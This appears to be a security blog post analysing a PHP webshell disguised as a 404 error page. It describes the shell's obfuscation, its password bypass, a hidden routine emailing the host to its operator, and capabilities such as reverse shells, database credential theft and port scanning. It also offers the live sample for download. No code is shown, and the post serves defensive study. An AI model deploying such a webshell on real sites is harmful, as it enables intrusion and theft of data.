Recently, I stumbled across a webshell that was impersonating a 404 page not found error. The original filename was "404.php.gif". I did notify the owner of the site. After acquiring the webshell and then placing it in a VM, you quickly see the 404 message.
Then viewing the source of the page we notice some code that is not showing that is requesting a password.
The source code is base64_encoded and gzipped. After extracting the original code you see the following heading.
Quickly you find a password in the form of an MD5 hash. Instead of breaking the hash, I find the section in the code and comment it out so I can get past it. Then the main interface of the webshell loads.
Looking through the code you find a base64 encoded section that sends an email to a gmail account.
The email contains the host of the webshell and the MD5 of the password that is used to access the site. This code is executed when someone accesses the webshell.
This webshell has full access to the files on the site. This would allow the shell operator to find the config.inc.php file containing database credentials. Then the credentials could be placed into the "Sql" section of the webshell to provide full access to the database.
In addition to the above mentioned functions the webshell has built-in functions to open up a shell using perl, a reverse shell using perl, running system commands through php, searching for local-file inclusion vulnerabilities, port scanning the local host, port scanning other hosts on the network or other networks, and other functions.
Update your sites and verify your code has not changed. Here is a copy of the webshell if you would like to explore it. Password is "malware".
Twitter: @lokut
This blog is for educational purposes only. The opinions expressed in this blog are my own and do not reflect the views of my employers.
Subscribe to:
Post Comments (Atom)
Test Authentication from Linux Console using python3 pexpect
Working with the IT420 lab, you will discover that we need to discover a vulnerable user account. The following python3 script uses the pex...
-
Here is a quick walk through of GetBoo. The first item that I found was you can harvest the usernames of the existing users that are regist...
-
As I was glancing through the logs of my honeypots I spent some time to look at the following logs. In the past I have just overlooked them...
-
I thought I would work through a few of these web applications provided by OWASP on their broken web applications VM. The first one I th...
-
Today looking at the logs of the honeypots, I became curious based on the whois of the IP Addresses attempting to login to SSH which country...
-
Recently I was doing some scanning with a tool that is available on github called masscan. The tool allows you to configure a configuration...
No comments:
Post a Comment